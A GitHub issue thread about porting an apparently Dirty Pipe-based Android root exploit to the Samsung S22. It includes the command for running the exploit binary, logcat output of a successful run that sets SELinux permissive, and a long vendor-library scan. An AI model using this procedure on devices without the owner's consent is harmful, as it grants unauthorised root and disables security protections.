Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

S22 #3

Open
oakieville opened this issue Mar 25, 2022 · 158 comments
Open

S22 #3

oakieville opened this issue Mar 25, 2022 · 158 comments

Comments

@oakieville
Copy link

Could this same method work on s22, i assume it woukd require mymod.ko be built in s22 kernel source but can it work

@polygraphene
Copy link
Owner

Basically it should work by similar procedure.
Need some modifications like:

  1. Fix function offset of libc++.so
  2. Choose proper library file to overwrite
  3. Build mymod.ko for s22 kernel source

If there is a dev interested in that, I can help them.

@oakieville
Copy link
Author

Im interesting to try it i have s22 kernel source as well as the firmware to extract libc++ however i would a good deal of guidance in this

@oakieville
Copy link
Author

If would could chat on telegram or whats app that would be great

@oakieville
Copy link
Author

if possible contact me please oakieville209@gmail.com

@oakieville
Copy link
Author

s22 libc++.so

000403e1 w DF .text 00000030 Base std::__1::basic_streambuf<char, std::__1::char_traits >::basic_streambuf()
000403e1 w DF .text 00000030 Base std::__1::basic_streambuf<char, std::__1::char_traits >::basic_streambuf()

@polygraphene
Copy link
Owner

Our schedules might not match for chat.

I added auto detection of offset for libc++.so, so the remaining issues are kernel module and libstagefright_soft_mp3dec.so.
kernel module may run other devices without modification. Try it to check if it works.

Target vendor lib (in Pixel 6, libstagefright_soft_mp3dec.so) must have byte 0x57 at offset 0x1000 like following:

$ xxd libstagefright_soft_mp3dec.so|grep 01000:
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__

If you could get firmware image for the device, extract vendor.img on PC and find proper lib with following command:

$ for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
(snip)
vendor/lib/libstagefright_soft_hevcdec.so
vendor/lib/libstagefright_soft_mp3dec.so
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__
vendor/lib/libstagefright_soft_mpeg2dec.so
vendor/lib/libstagefright_soft_mpeg4dec.so
(snip)

If couldn't find proper lib, we should find other methods.

@polygraphene
Copy link
Owner

After find lib:

adb shell /data/local/tmp/dirtypipe-android -f (Found lib path)

You can also use /vendor/lib64/*.so, but 32bit lib should have small impact on the system.

If you succeed, adb logcat looks like:

03-27 15:30:08.230     1     1 W /system/bin/init: type=1107 audit(0.0:27746): uid=0 auid=4294967295 ses=4294967295 subj=u:r:init:s0 msg='avc: denied { set } for property=a pid=12648 uid=2000 gid=2000 scontext=u:r:shell:s0 tcontext=u:object_r:default_prop:s0 tclass=property_service permissive=0'
03-27 15:30:08.240 12648 12648 W libc    : Unable to set property "a" to "a": error code: 0x18
01-01 09:00:00.1023 12649 12649 I stage2  : pipe_size: 65536
01-01 09:00:00.1023 12649 12649 I stage2  : Wait for child pid=12653
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27747): avc: denied { read } for path="/dev/.dirtypipe-0057" dev="tmpfs" ino=1223 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27748): avc: denied { read } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27749): avc: denied { write } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.343 12653 12653 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27750): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27751): avc: denied { execute } for name="startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27752): avc: denied { read open } for path="/data/local/tmp/startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
01-01 09:00:00.1023 12649 12649 I stage2  : waitid returned with 0. Restore files.
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28232): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28233): avc: denied { getattr } for path="/data/local/tmp/reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=fifo_file permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28234): avc: denied { dac_override } for capability=1 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:vendor_modprobe:s0 tclass=capability permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28235): avc: denied { write } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28236): avc: denied { remove_name } for name="reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1

@elliwigy
Copy link

Not sure if it matters but you can run those commands from shell/on the device itself.. If you run:

xxd libstagefright_soft_mp3dec.so|grep 01000
00001000: 695f 6d65 6d63 7079 3400 5f5f 6165 6162  i_memcpy4.__aeab
00010000: 1400 5ae3 f2fa ffda 1500 5ae3 f7fa ff1a  ..Z.......Z.....

and furthermore the other code returns a long list which I will provide shortly.. are we looking for something that contains this exactly:

00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f _aeabi_memcpy.__

@oakieville
Copy link
Author

Hey elliwigy how are you doing, ok i will check as you instructrd above i do see that libstagefright_soft_mp3dec.so on s22 doesnt seem to exist there other libstagefright libs there how i have not yet checked offset i will do so later today or tomorrow.

@elliwigy
Copy link

These are all the ones it finds:

for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
vendor/lib/android.automotive.watchdog-V2-ndk_platform.so
vendor/lib/android.frameworks.cameraservice.common@2.0.so
vendor/lib/android.frameworks.cameraservice.device@2.0.so
vendor/lib/android.frameworks.cameraservice.device@2.1.so
vendor/lib/android.frameworks.cameraservice.service@2.0.so
vendor/lib/android.frameworks.cameraservice.service@2.1.so
vendor/lib/android.frameworks.cameraservice.service@2.2.so
vendor/lib/android.frameworks.sensorservice@1.0.so
vendor/lib/android.hardware.audio.common-util.so
vendor/lib/android.hardware.audio.common@2.0-util.so
vendor/lib/android.hardware.audio.common@4.0-util.so
vendor/lib/android.hardware.audio.common@4.0.so
vendor/lib/android.hardware.audio.common@5.0-util.so
vendor/lib/android.hardware.audio.common@5.0.so
vendor/lib/android.hardware.audio.common@6.0-util.so
vendor/lib/android.hardware.audio.common@6.0.so
vendor/lib/android.hardware.audio.common@7.0-enums.so
vendor/lib/android.hardware.audio.common@7.0-util.so
vendor/lib/android.hardware.audio.common@7.0.so
vendor/lib/android.hardware.audio.effect@2.0-util.so
vendor/lib/android.hardware.audio.effect@2.0.so
vendor/lib/android.hardware.audio.effect@4.0-util.so
vendor/lib/android.hardware.audio.effect@4.0.so
vendor/lib/android.hardware.audio.effect@5.0-util.so
vendor/lib/android.hardware.audio.effect@5.0.so
vendor/lib/android.hardware.audio.effect@6.0-util.so
vendor/lib/android.hardware.audio.effect@6.0.so
vendor/lib/android.hardware.audio.effect@7.0-util.so
vendor/lib/android.hardware.audio.effect@7.0.so
vendor/lib/android.hardware.audio@2.0-util.so
vendor/lib/android.hardware.audio@2.0.so
vendor/lib/android.hardware.audio@4.0-util.so
vendor/lib/android.hardware.audio@4.0.so
vendor/lib/android.hardware.audio@5.0-util.so
00001000: 5f5a 4e37 616e 6472 6f69 6438 6861 7264  _ZN7android8hard
vendor/lib/android.hardware.audio@5.0.so
vendor/lib/android.hardware.audio@6.0-util.so
00001000: 5f5a 4e37 616e 6472 6f69 6438 6861 7264  _ZN7android8hard
vendor/lib/android.hardware.audio@6.0.so
vendor/lib/android.hardware.audio@7.0-util.so
vendor/lib/android.hardware.audio@7.0.so
vendor/lib/android.hardware.automotive.vehicle@2.0-manager-lib.so
vendor/lib/android.hardware.automotive.vehicle@2.0.so
vendor/lib/android.hardware.biometrics.face@1.0.so
vendor/lib/android.hardware.bluetooth.audio@2.0.so
vendor/lib/android.hardware.bluetooth.audio@2.1.so
vendor/lib/android.hardware.camera.common@1.0.so
vendor/lib/android.hardware.camera.device@1.0.so
vendor/lib/android.hardware.camera.device@3.2.so
vendor/lib/android.hardware.camera.device@3.3.so
vendor/lib/android.hardware.camera.device@3.4.so
vendor/lib/android.hardware.camera.device@3.5.so
vendor/lib/android.hardware.camera.device@3.6.so
vendor/lib/android.hardware.camera.device@3.7.so
vendor/lib/android.hardware.camera.metadata@3.2.so
vendor/lib/android.hardware.camera.metadata@3.3.so
vendor/lib/android.hardware.camera.metadata@3.4.so
vendor/lib/android.hardware.camera.metadata@3.5.so
vendor/lib/android.hardware.camera.metadata@3.6.so
vendor/lib/android.hardware.camera.provider@2.4-legacy.so
vendor/lib/android.hardware.camera.provider@2.4.so
vendor/lib/android.hardware.camera.provider@2.5-legacy.so
vendor/lib/android.hardware.camera.provider@2.5.so
vendor/lib/android.hardware.camera.provider@2.6.so
vendor/lib/android.hardware.cas.native@1.0.so
vendor/lib/android.hardware.cas@1.0.so
vendor/lib/android.hardware.cas@1.1.so
vendor/lib/android.hardware.cas@1.2.so
vendor/lib/android.hardware.gatekeeper@1.0.so
vendor/lib/android.hardware.gnss.measurement_corrections@1.0.so
vendor/lib/android.hardware.gnss.measurement_corrections@1.1.so
vendor/lib/android.hardware.gnss.visibility_control@1.0.so
vendor/lib/android.hardware.gnss@1.0.so
vendor/lib/android.hardware.gnss@1.1.so
vendor/lib/android.hardware.gnss@2.0.so
vendor/lib/android.hardware.gnss@2.1.so
vendor/lib/android.hardware.graphics.composer@2.1.so
vendor/lib/android.hardware.graphics.composer@2.2.so
vendor/lib/android.hardware.graphics.composer@2.3.so
vendor/lib/android.hardware.health@1.0.so
vendor/lib/android.hardware.health@2.0.so
vendor/lib/android.hardware.health@2.1.so
vendor/lib/android.hardware.media.c2@1.0.so
vendor/lib/android.hardware.media.c2@1.1.so
vendor/lib/android.hardware.power@1.0.so
vendor/lib/android.hardware.power@1.1.so
vendor/lib/android.hardware.power@1.2.so
vendor/lib/android.hardware.sensors@1.0.so
vendor/lib/android.hardware.sensors@2.0-ScopedWakelock.so
vendor/lib/android.hardware.sensors@2.0.so
vendor/lib/android.hardware.sensors@2.1.so
vendor/lib/android.hardware.soundtrigger@2.1.so
vendor/lib/android.hardware.soundtrigger@2.2.so
vendor/lib/android.hardware.soundtrigger@2.3.so
vendor/lib/android.hardware.thermal@1.0.so
vendor/lib/android.hardware.thermal@2.0.so
vendor/lib/android.hidl.allocator@1.0.so
vendor/lib/android.hidl.memory.block@1.0.so
vendor/lib/android.system.net.netd@1.0.so
vendor/lib/android.system.net.netd@1.1.so
vendor/lib/audio_common-aidl-cpp.so
vendor/lib/audioclient-types-aidl-cpp.so
vendor/lib/btaudio_offload_if.so
vendor/lib/camera.device@1.0-impl.so
vendor/lib/camera.device@3.2-impl.so
vendor/lib/camera.device@3.3-impl.so
vendor/lib/camera.device@3.4-impl.so
vendor/lib/camera.device@3.5-impl.so
vendor/lib/camx.device@3.2-impl.so
vendor/lib/camx.device@3.3-impl.so
vendor/lib/camx.device@3.4-ext-impl.so
vendor/lib/camx.device@3.4-impl.so
vendor/lib/camx.device@3.5-ext-impl.so
vendor/lib/camx.device@3.5-impl.so
vendor/lib/camx.device@3.6-ext-impl.so
vendor/lib/camx.device@3.6-impl.so
vendor/lib/camx.provider@2.4-external.so
vendor/lib/camx.provider@2.4-impl.so
vendor/lib/camx.provider@2.4-legacy.so
vendor/lib/camx.provider@2.5-external.so
vendor/lib/camx.provider@2.5-legacy.so
vendor/lib/camx.provider@2.6-legacy.so
vendor/lib/cdsp_face.so
vendor/lib/cdsp_face_4.2.so
vendor/lib/com.qti.chiusecaseselector.so
vendor/lib/com.qti.feature2.anchorsync.so
vendor/lib/com.qti.feature2.demux.so
vendor/lib/com.qti.feature2.derivedoffline.so
vendor/lib/com.qti.feature2.frameselect.so
vendor/lib/com.qti.feature2.fusion.so
vendor/lib/com.qti.feature2.generic.so
vendor/lib/com.qti.feature2.gs.cedros.so
vendor/lib/com.qti.feature2.gs.fillmore.so
vendor/lib/com.qti.feature2.gs.sdm865.so
vendor/lib/com.qti.feature2.gs.sm8350.so
vendor/lib/com.qti.feature2.gs.sm8450.so
vendor/lib/com.qti.feature2.hdr.so
vendor/lib/com.qti.feature2.mcreprocrt.so
vendor/lib/com.qti.feature2.memcpy.so
vendor/lib/com.qti.feature2.mfsr.sm8450.so
vendor/lib/com.qti.feature2.mfsr.so
vendor/lib/com.qti.feature2.ml.so
vendor/lib/com.qti.feature2.mux.so
vendor/lib/com.qti.feature2.qcfa.so
vendor/lib/com.qti.feature2.rawhdr.so
vendor/lib/com.qti.feature2.realtimeserializer.so
vendor/lib/com.qti.feature2.rt.so
vendor/lib/com.qti.feature2.rtmcx.so
vendor/lib/com.qti.feature2.serializer.so
vendor/lib/com.qti.feature2.statsregeneration.so
vendor/lib/com.qti.feature2.stub.so
vendor/lib/com.qti.feature2.swmf.so
vendor/lib/com.qti.qseeaon.so
vendor/lib/com.qti.qseeutils.so
vendor/lib/com.qti.settings.fillmore.so
vendor/lib/com.qti.settings.sm8450.so
vendor/lib/com.qti.stats.common.so
vendor/lib/com.qualcomm.mcx.distortionmapper.so
vendor/lib/com.qualcomm.mcx.linearmapper.so
vendor/lib/com.qualcomm.mcx.policy.mfl.so
vendor/lib/com.qualcomm.mcx.policy.xr.so
vendor/lib/com.qualcomm.qti.imscmservice@1.0.so
vendor/lib/com.qualcomm.qti.imscmservice@2.0.so
vendor/lib/com.qualcomm.qti.imscmservice@2.1.so
vendor/lib/com.qualcomm.qti.imscmservice@2.2.so
vendor/lib/com.qualcomm.qti.mcx.usecase.extension.so
vendor/lib/com.qualcomm.qti.uceservice@2.0.so
vendor/lib/com.qualcomm.qti.uceservice@2.1.so
vendor/lib/com.qualcomm.qti.uceservice@2.2.so
vendor/lib/com.qualcomm.qti.uceservice@2.3.so
vendor/lib/framework-permission-aidl-cpp.so
vendor/lib/libAFSegmenter_v1.camera.samsung.so
vendor/lib/libAImode_wrapper.camera.samsung.so
vendor/lib/libAIphoto_core.camera.samsung.so
vendor/lib/libAlacSwDec.so
vendor/lib/libApeSwDec.so
vendor/lib/libBeauty_v4.camera.samsung.so
vendor/lib/libBlurDetectionDeepLearning.camera.samsung.so
vendor/lib/libCB.so
vendor/lib/libDepthBokehVideo_interface.so
vendor/lib/libDeviceInfoProvider.so
vendor/lib/libEGL_adreno.so
vendor/lib/libEventFinder.camera.samsung.so
vendor/lib/libEvrcSwCodec.so
vendor/lib/libFacePreProcessing.camera.samsung.so
vendor/lib/libFaceService.so
vendor/lib/libFace_Landmark_API.camera.samsung.so
vendor/lib/libFastUWDistortionCorrection.camera.samsung.so
vendor/lib/libFlacSwDec.so
vendor/lib/libFrucSSMLib.so
vendor/lib/libGLESv2_adreno.so
vendor/lib/libGPQTEEC_vendor.so
vendor/lib/libGPTEE_vendor.so
vendor/lib/libGPreqcancel.so
vendor/lib/libGPreqcancel_svc.so
vendor/lib/libHDRVerifier_v1.camera.samsung.so
vendor/lib/libHandGesture.camera.samsung.so
vendor/lib/libHprFace_GAE_api.camera.samsung.so
vendor/lib/libHprVisualEffect.so
vendor/lib/libHpr_RecGAE_cvFeature_v1.0.camera.samsung.so
vendor/lib/libHumanSegVideoModel_Vendor.so
vendor/lib/libIDDQD_core.so
vendor/lib/libIMUSensor.so
vendor/lib/libLocalTM_capture_core.camera.samsung.so
vendor/lib/libLocalTM_preview_core.so
vendor/lib/libLocalTM_wrapper.camera.samsung.so
vendor/lib/libMoireDetection.camera.samsung.so
vendor/lib/libMoireDetectionWrapper.camera.samsung.so
vendor/lib/libMoireDetector.uniplugin@1.0.so
vendor/lib/libMoonVerifier_v1.camera.samsung.so
vendor/lib/libObjectDetector_v1.camera.samsung.so
vendor/lib/libOmxCore.so
vendor/lib/libOpenCL.so
vendor/lib/libOpenCv.camera.samsung.so
vendor/lib/libPanDetector.so
vendor/lib/libPersonal_capture.camera.samsung.so
vendor/lib/libPersonal_core.camera.samsung.so
vendor/lib/libPetDetector_interface.so
vendor/lib/libPlaneSegmentationWrapper.so
vendor/lib/libQSEEComAPI.so
vendor/lib/libQTEEConnector_listener.so
vendor/lib/libQTEEConnector_vendor.so
vendor/lib/libQcelp13SwCodec.so
vendor/lib/libRelighting_API.camera.samsung.so
vendor/lib/libSSMAutoTrigger_interface.so
vendor/lib/libSSM_AutoTrigger.so
vendor/lib/libSceneDetector_v1.camera.samsung.so
vendor/lib/libSingleTakeBlurDetection.uniplugin@1.0.so
vendor/lib/libTouchInputVM.so
vendor/lib/libTrustedInput.so
vendor/lib/libTrustedInputTZ.so
vendor/lib/libTrustedUI.so
vendor/lib/libTrustedUITZ.so
vendor/lib/libTrustedUIVM.so
vendor/lib/libVideoSuperNight_interface.so
vendor/lib/lib_SamsungRec_08020.so
vendor/lib/lib_SoundAlive_3DPosition_ver202.so
vendor/lib/lib_SoundAlive_AlbumArt_ver105.so
vendor/lib/lib_SoundAlive_play_plus_ver500.so
vendor/lib/lib_SoundBooster_ver1100.so
vendor/lib/lib_bt_aptx.so
vendor/lib/lib_bt_ble.so
vendor/lib/lib_bt_bundle.so
vendor/lib/lib_lvacfs.so
vendor/lib/libadm.so
vendor/lib/libadreno_app_profiles.so
vendor/lib/libadreno_utils.so
vendor/lib/libadsp_default_listener.so
vendor/lib/libadsprpc.so
vendor/lib/libagm.so
vendor/lib/libagm_compress_plugin.so
vendor/lib/libagm_mixer_plugin.so
vendor/lib/libagm_pcm_plugin.so
vendor/lib/libagmclient.so
vendor/lib/libagmmixer.so
vendor/lib/libaidenoiser.so
vendor/lib/libaivideocentral.arcsoft.so
vendor/lib/libalsautils.so
vendor/lib/libapex_cmn.so
vendor/lib/libapex_utils.so
vendor/lib/libar-acdb.so
vendor/lib/libar-gpr.so
vendor/lib/libar-gsl.so
vendor/lib/libar-pal.so
vendor/lib/libarcsoft_aieffectpk_video.so
vendor/lib/libarcsoft_aieffectpk_video_bokeh.so
vendor/lib/libarcsoft_aieffectpk_video_plight.so
vendor/lib/libarcsoft_dualcam_portraitlighting_preview.so
vendor/lib/libarcsoft_object_tracking.so
vendor/lib/libarcsoft_video_super_night.so
00001000: 5f63 6f6e 645f 6272 6f61 6463 6173 7400  _cond_broadcast.
vendor/lib/libats.so
vendor/lib/libaudio_log_utils.so
vendor/lib/libaudioclient_aidl_conversion.so
vendor/lib/libaudiofoundation.so
vendor/lib/libauto_framing_arcsoft.uniplugin@1.0.so
vendor/lib/libautotracking_interface.so
vendor/lib/libavservices_minijail.so
vendor/lib/libbase64.so
vendor/lib/libbatching.so
vendor/lib/libbatterylistener.so
vendor/lib/libbauthserver.so
vendor/lib/libbauthtzcommon.so
vendor/lib/libbeautyshot.arcsoft.so
vendor/lib/libbitmlengine.so
vendor/lib/libbitmlenginev2.so
vendor/lib/libbluetooth_a2dpsink_session.so
vendor/lib/libbluetooth_audio_session.so
vendor/lib/libbluetooth_audio_session_qti.so
vendor/lib/libbluetooth_audio_session_qti_2_1.so
vendor/lib/libbodyid.arcsoft.so
vendor/lib/libbthost_if.so
vendor/lib/libcacertclient.so
vendor/lib/libcamera2ndk_vendor.so
vendor/lib/libcamera_nn_stub.so
vendor/lib/libcamerapostproc.so
vendor/lib/libcamxcommonutils.so
vendor/lib/libcamxexternalformatutils.so
vendor/lib/libcamxfacialfeatures.so
vendor/lib/libcamxfdalgo.so
vendor/lib/libcamxfdengine.so
vendor/lib/libcamxhwnodecontext.so
vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libcamximageformatutils.so
vendor/lib/libcamxqsatalgo.so
vendor/lib/libcamxsettingsmanager.so
vendor/lib/libcamxstatscore.so
vendor/lib/libcamxswispiqmodule.so
vendor/lib/libcamxswprocessalgo.so
vendor/lib/libcamxtintlessalgo.so
vendor/lib/libcapiv2svacnnvendor.so
vendor/lib/libcapiv2svarnnvendor.so
vendor/lib/libcapiv2uvvendor.so
vendor/lib/libcdfw.so
vendor/lib/libcdfw_remote_api.so
vendor/lib/libcdsp_default_listener.so
vendor/lib/libcdsprpc.so
vendor/lib/libchilog.so
vendor/lib/libchrome.so
vendor/lib/libcne.so
vendor/lib/libcneapiclient.so
vendor/lib/libcneoplookup.so
vendor/lib/libcneqmiutils.so
vendor/lib/libcodec2_hidl@1.0.so
vendor/lib/libcodec2_hidl@1.1.so
vendor/lib/libcodec2_hidl_plugin.so
vendor/lib/libcodec2_simple_component.so
vendor/lib/libcodec2_soft_common.so
vendor/lib/libcodec2_vndk.so
vendor/lib/libcodecsolutionhelper_vendor.so
vendor/lib/libcolor-default.so
vendor/lib/libcom.qti.chinodeutils.so
vendor/lib/libconfigdb.so
vendor/lib/libcpion.so
vendor/lib/libcv_common.so
vendor/lib/libdataitems.so
vendor/lib/libdepth_bokeh_video.uniplugin@1.0.so
vendor/lib/libdiag.so
vendor/lib/libdiagjni.so
vendor/lib/libdigital-dimming.so
vendor/lib/libdisp-aba.so
vendor/lib/libdisplayconfig.qti.so
vendor/lib/libdisplaydebug.so
vendor/lib/libdisplayqos.so
vendor/lib/libdisplayskuutils.so
vendor/lib/libdpps.so
vendor/lib/libdrm.so
vendor/lib/libdrmfs.so
00001000: 5f63 6669 5f63 6865 636b 5f66 6169 6c5f  _cfi_check_fail_
vendor/lib/libdrmtime.so
vendor/lib/libdrmutils.so
vendor/lib/libdsd2pcm.so
vendor/lib/libdsi_netctrl.so
vendor/lib/libdsphist_qc.so
vendor/lib/libdspmc_qc.so
vendor/lib/libdspmc_wrapper.so
vendor/lib/libdsutils.so
vendor/lib/libdualcam_refocus_image.so
vendor/lib/libdualcam_refocus_video.so
vendor/lib/libeffects.so
vendor/lib/libeffectsconfig.so
vendor/lib/libegis_fp_normal_sensor_test.so
vendor/lib/libengine_did.so
vendor/lib/libesesbprovision.so
vendor/lib/libeva.so
vendor/lib/libeva_util.so
vendor/lib/libevent_finder.uniplugin@1.0.so
vendor/lib/libexifa.camera.samsung.so
vendor/lib/libface_landmark.arcsoft.so
vendor/lib/libfast_uwdc.uniplugin@1.0.so
vendor/lib/libfastcvdsp_stub.so
vendor/lib/libfastcvopt.so
vendor/lib/libfidoauthnr_v2.so
vendor/lib/libfilefinder.so
vendor/lib/libfloatingfeature.so
vendor/lib/libfmpal.so
00001000: 5f31 325f 5f76 616c 7565 5f74 7970 6549  _12__value_typeI
vendor/lib/libfocuspeaking.so
vendor/lib/libfocuspeaking.uniplugin@1.0.so
vendor/lib/libformatConverter.unifunc.so
vendor/lib/libgame_enhance.so
vendor/lib/libgaya.so
vendor/lib/libgeofencing.so
vendor/lib/libgf_in_system_lib.so
vendor/lib/libgnss.so
vendor/lib/libgnsspps.so
vendor/lib/libgps.utils.so
vendor/lib/libgpu_tonemapper.so
00001000: 5f00 5f5a 3230 656e 6769 6e65 5f64 656c  _._Z20engine_del
vendor/lib/libgpudataproducer.so
vendor/lib/libgralloc.qti.so
vendor/lib/libgralloc_helper.unifunc.so
vendor/lib/libgralloccore.so
vendor/lib/libgrallocusage.so
vendor/lib/libgrallocutils.so
vendor/lib/libgsl.so
vendor/lib/libhand_interaction.uniplugin@1.0.so
vendor/lib/libhandgesture.arcsoft.so
vendor/lib/libhdcp1prov.so
vendor/lib/libhdcp2p2prov.so
vendor/lib/libhdcpsrm.so
vendor/lib/libhdr10plus.so
vendor/lib/libhdr_backlight_adapter.so
vendor/lib/libhdr_tm.so
vendor/lib/libhdradaptivecustom.so
vendor/lib/libhdrdynamic.so
vendor/lib/libhdrdynamicootf.so
vendor/lib/libhermes.so
00001000: 5f39 616c 6c6f 6361 746f 7249 5335 5f45  _9allocatorIS5_E
vendor/lib/libhidltransport.so
vendor/lib/libhqm_hwparam.so
vendor/lib/libhwbinder.so
vendor/lib/libhypermotion_core.so
vendor/lib/libhypermotion_interface.so
vendor/lib/libhypervintf.so
vendor/lib/libiddqd.uniplugin@1.0.so
vendor/lib/libidl.so
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p
vendor/lib/libimagecodec_native.quram.so
vendor/lib/libipebpsstriping.so
vendor/lib/libipebpsstriping170.so
vendor/lib/libipebpsstriping480.so
vendor/lib/libizat_client_api.so
vendor/lib/libizat_core.so
vendor/lib/libjnihelper.so
vendor/lib/libjpege.so
vendor/lib/libjpegencoder_sw.unifunc.so
vendor/lib/libjpegsq.media.samsung.so
vendor/lib/libjpegsqueezer_sw.unifunc.so
vendor/lib/libjson.so
vendor/lib/libkcl.so
vendor/lib/libkernelmanager.so
vendor/lib/liblbs_core.so
vendor/lib/liblistensoundmodel2vendor.so
vendor/lib/liblivefocus_capture_engine.so
vendor/lib/liblivefocus_capture_interface.so
vendor/lib/liblivefocus_preview_engine.so
vendor/lib/liblivefocus_preview_interface.so
vendor/lib/libllvm-glnext.so
vendor/lib/libllvm-qcom.so
vendor/lib/libllvm-qgl.so
vendor/lib/libloc_api_v02.so
vendor/lib/libloc_api_wds.so
vendor/lib/libloc_core.so
vendor/lib/libloc_socket.so
vendor/lib/libloc_util.so
vendor/lib/liblocation_api.so
vendor/lib/liblocationservice.so
vendor/lib/liblocationservice_glue.so
vendor/lib/liblowi_client.so
vendor/lib/liblx-ar_util.so
vendor/lib/liblx-osal.so
vendor/lib/libmaskdetection.uniplugin@1.0.so
vendor/lib/libmcs.so
vendor/lib/libmctfengine_stub.so
vendor/lib/libmdmdetect.so
vendor/lib/libmdsprpc.so
vendor/lib/libmfGhostDetection.so
vendor/lib/libminkdescriptor.so
vendor/lib/libminksocket_vendor.so
vendor/lib/libmm-hdcpmgr.so
vendor/lib/libmm-omxcore.so
vendor/lib/libmmcamera_bestats.so
00001000: 5f75 0043 636c 616d 7036 345f 7300 4363  _u.Cclamp64_s.Cc
vendor/lib/libmmcamera_cac3.so
vendor/lib/libmmcamera_lscv35.so
vendor/lib/libmmcamera_mfnr.so
vendor/lib/libmmcamera_mfnr_t4.so
vendor/lib/libmmcamera_pdpc.so
vendor/lib/libmpbase.so
vendor/lib/libmulticam_image_optical_zoom.so
vendor/lib/libmulticam_optical_zoom_control.so
vendor/lib/libmulticam_video_optical_zoom.so
vendor/lib/libmultiobject_tracker.so
vendor/lib/libnative-api.so
vendor/lib/libnbaio_mono.so
vendor/lib/libnetmgr.so
vendor/lib/libnetmgr_common.so
vendor/lib/libnetmgr_utils.so
vendor/lib/libnetmgrxfrmutils.so
vendor/lib/liboemaids_vendor.so
vendor/lib/liboemcrypto.so
vendor/lib/libopencv.so
vendor/lib/libopencv3a.so
vendor/lib/libopenvx.so
vendor/lib/libopestriping.so
00001000: 5f6d 696e 696d 616c 005f 5f75 6273 616e  _minimal.__ubsan
vendor/lib/libops.so
vendor/lib/libopus.so
vendor/lib/libos.so
vendor/lib/libpa.so
vendor/lib/libpadm.so
vendor/lib/libpalclient.so
vendor/lib/libpantilt_detector.uniplugin@1.0.so
vendor/lib/libpassese.so
vendor/lib/libpdmapper.so
vendor/lib/libpdnotifier.so
vendor/lib/libperfconfig.so
00001000: 5f5a 4e31 3950 6572 6643 6f6e 6669 6744  _ZN19PerfConfigD
vendor/lib/libperfgluelayer.so
vendor/lib/libperfioctl.so
vendor/lib/libperipheral_client.so
vendor/lib/libpersonalimprinting.uniplugin@1.0.so
vendor/lib/libpet_detector.uniplugin@1.0.so
vendor/lib/libplatformconfig.so
vendor/lib/libpredeflicker_native.so
vendor/lib/libprofileparamstorage.so
vendor/lib/libprotobuf-cpp-full-3.9.1.so
vendor/lib/libprotobuf-cpp-lite-3.9.1.so
vendor/lib/libpsi.so
vendor/lib/libq3dtools_adreno.so
vendor/lib/libqc2audio_base.so
vendor/lib/libqc2audio_basecodec.so
vendor/lib/libqc2audio_core.so
vendor/lib/libqc2audio_hooks.so
vendor/lib/libqc2audio_hwaudiocodec.so
vendor/lib/libqc2audio_platform.so
vendor/lib/libqc2audio_swaudiocodec.so
vendor/lib/libqc2audio_utils.so
vendor/lib/libqc2colorconvertfilter.so
vendor/lib/libqc2filter.so
vendor/lib/libqc2imageformatfilter.so
vendor/lib/libqcbor.so
vendor/lib/libqcc_file_agent.so
00001000: 5f62 6173 6963 5f73 7472 696e 675f 636f  _basic_string_co
vendor/lib/libqcci_legacy.so
vendor/lib/libqcmaputils.so
vendor/lib/libqcodec2_base.so
vendor/lib/libqcodec2_basecodec.so
vendor/lib/libqcodec2_core.so
vendor/lib/libqcodec2_filterbase.so
vendor/lib/libqcodec2_hooks.so
vendor/lib/libqcodec2_mockfilter.so
vendor/lib/libqcodec2_mockqc2filter.so
vendor/lib/libqcodec2_platform.so
